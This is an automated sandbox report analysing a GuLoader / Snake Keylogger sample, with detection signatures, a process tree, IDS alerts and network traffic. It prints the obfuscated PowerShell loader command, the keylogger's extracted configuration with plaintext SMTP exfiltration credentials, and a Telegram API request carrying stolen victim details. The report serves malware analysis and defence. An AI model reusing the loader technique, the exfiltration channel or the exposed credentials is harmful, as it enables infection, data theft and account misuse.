Edit tour

Windows Analysis Report
4PYRGCo1Di.exe

Overview

General Information

Sample name:	4PYRGCo1Di.exe renamed because original name is a hash value
Original sample name:	7663def8e50e514bd22d33a3bf17cf9bdfd5cd4d9fb57ba6d5c4d88009e5f7a9.exe
Analysis ID:	1632202
MD5:	7032388fc7192e10a98a860844cfb1bc
SHA1:	207ded51b45823675828c1be9567f43cf4c07e63
SHA256:	7663def8e50e514bd22d33a3bf17cf9bdfd5cd4d9fb57ba6d5c4d88009e5f7a9
Tags:	exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

4PYRGCo1Di.exe (PID: 5368 cmdline: "C:\Users\user\Desktop\4PYRGCo1Di.exe" MD5: 7032388FC7192E10A98A860844CFB1BC)

powershell.exe (PID: 6520 cmdline: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5312 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

svchost.exe (PID: 4716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.1207225710.0000000009B5A000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 5312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 5312	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DesusertionIp: 216.58.212.174, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5312, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49687

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)", CommandLine: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4PYRGCo1Di.exe", ParentImage: C:\Users\user\Desktop\4PYRGCo1Di.exe, ParentProcessId: 5368, ParentProcessName: 4PYRGCo1Di.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)", ProcessId: 6520, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4716, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:52:22.156075+0100	2803305	3	Unknown Traffic	192.168.2.9	49695	104.21.16.1	443	TCP
2025-03-07T20:52:33.340944+0100	2803305	3	Unknown Traffic	192.168.2.9	49699	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:52:17.008289+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49693	132.226.8.169	80	TCP
2025-03-07T20:52:19.930193+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49693	132.226.8.169	80	TCP
2025-03-07T20:52:24.836499+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49696	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:52:09.133481+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49687	216.58.212.174	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:53:01.132419+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49710	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4PYRGCo1Di.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exe

Avira: detection malicious, Label: TR/Injector.cgefa

Found malware configuration

Source: 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: 4PYRGCo1Di.exe	Virustotal: Detection: 69%			Perma Link
Source: 4PYRGCo1Di.exe	ReversingLabs: Detection: 50%

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 3_2_046E87A8 CryptUnprotectData,		3_2_046E87A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 3_2_046E8EF1 CryptUnprotectData,		3_2_046E8EF1

Source: 4PYRGCo1Di.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.9:49694 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.9:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.9:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2

Source: 4PYRGCo1Di.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Code function: 0_2_00406739 FindFirstFileW,FindClose,	0_2_00406739
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AED
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Code function: 0_2_00402902 FindFirstFileW,	0_2_00402902

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0287F45Dh	3_2_0287F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0287F45Dh	3_2_0287F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0287FC19h	3_2_0287F974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BD069h	3_2_046BCDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046B3308h	3_2_046B2EF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046B2D41h	3_2_046B2A90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_046B0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BEED1h	3_2_046BEC28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BF781h	3_2_046BF4D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BF329h	3_2_046BF080
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BFBD9h	3_2_046BF930
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BD919h	3_2_046BD670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046B3308h	3_2_046B3236
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BD4C1h	3_2_046BD218
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046B3308h	3_2_046B2EE6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BDD71h	3_2_046BDAC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BE621h	3_2_046BE378
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BE1C9h	3_2_046BDF20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046B0D0Dh	3_2_046B0B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046B16F8h	3_2_046B0B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046BEA79h	3_2_046BE7D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E3709h	3_2_046E3460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EBF0Fh	3_2_046EBC40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E7EB5h	3_2_046E7B78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E9280h	3_2_046E8FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E4D21h	3_2_046E4A78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E7119h	3_2_046E6E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EF13Fh	3_2_046EEE70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E02E9h	3_2_046E0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E1CF9h	3_2_046E1A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E9F1Fh	3_2_046E9C50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E48C9h	3_2_046E4620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E62D9h	3_2_046E6030
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EDEFFh	3_2_046EDC30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E32B1h	3_2_046E3008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EACCFh	3_2_046EAA00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E6CC1h	3_2_046E6A18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EA3AFh	3_2_046EA0E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E0B99h	3_2_046E08F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E7571h	3_2_046E72C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EE38Fh	3_2_046EE0C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E5179h	3_2_046E4ED0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EC39Fh	3_2_046EC0D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E2151h	3_2_046E1EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E6733h	3_2_046E6488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046ED14Fh	3_2_046ECE80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E0741h	3_2_046E0498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EB15Fh	3_2_046EAE90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EC82Fh	3_2_046EC560
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EA83Fh	3_2_046EA570
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E0FF1h	3_2_046E0D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E2A01h	3_2_046E2758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EE81Fh	3_2_046EE550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E55D1h	3_2_046E5328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E79C9h	3_2_046E7720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EB5EFh	3_2_046EB320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E25A9h	3_2_046E2300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EF5CFh	3_2_046EF300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046ED5DFh	3_2_046ED310
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EECAFh	3_2_046EE9E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E18A1h	3_2_046E15F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046ECCBFh	3_2_046EC9F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E9A8Fh	3_2_046E97C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E5E81h	3_2_046E5BD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E1449h	3_2_046E11A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EDA6Fh	3_2_046ED7A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E2E59h	3_2_046E2BB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EBA7Fh	3_2_046EB7B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046E5A29h	3_2_046E5780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 046EFA5Fh	3_2_046EF790
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047047E8h	3_2_04704478
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04706B40h	3_2_04706848
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04704E90h	3_2_04704B98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470A968h	3_2_0470A670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470D470h	3_2_0470D178
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04705358h	3_2_04705060
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470EC59h	3_2_0470E960
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04707E60h	3_2_04707B68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04701E37h	3_2_04701B68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04709648h	3_2_04709350
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470C150h	3_2_0470BE58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04703E27h	3_2_04703B58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047002E7h	3_2_04700040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470D938h	3_2_0470D640
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04701517h	3_2_04701248
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04708328h	3_2_04708030
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470AE30h	3_2_0470AB38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04703507h	3_2_04703238
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470C618h	3_2_0470C320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04705820h	3_2_04705528
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04700BF7h	3_2_04700928
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470F120h	3_2_0470EE28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04707008h	3_2_04706D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04709B10h	3_2_04709818
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04702BE7h	3_2_04702918
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470B2F8h	3_2_0470B000
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470DE00h	3_2_0470DB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04705CE8h	3_2_047059F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470F5E8h	3_2_0470F2F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047087F0h	3_2_047084F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047022C7h	3_2_04701FF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04709FD8h	3_2_04709CE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047042B7h	3_2_04703FE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470CAE0h	3_2_0470C7E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470E2C8h	3_2_0470DFD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047074D0h	3_2_047071D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047019A7h	3_2_047016D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04708CB8h	3_2_047089C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470B7C0h	3_2_0470B4C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04703997h	3_2_047036C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470CFA8h	3_2_0470CCB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 047061B0h	3_2_04705EB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04701087h	3_2_04700DB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470FAB0h	3_2_0470F7B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04707998h	3_2_047076A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470A4A0h	3_2_0470A1A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04703078h	3_2_04702DA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470BC88h	3_2_0470B990
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0470E790h	3_2_0470E498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04700767h	3_2_04700498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04706678h	3_2_04706380
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04709180h	3_2_04708E88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 04702757h	3_2_04702488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06012A70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06012A80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49710 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2009/03/2025%20/%2019:27:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49696 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49693 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49699 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49695 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49687 -> 216.58.212.174:443

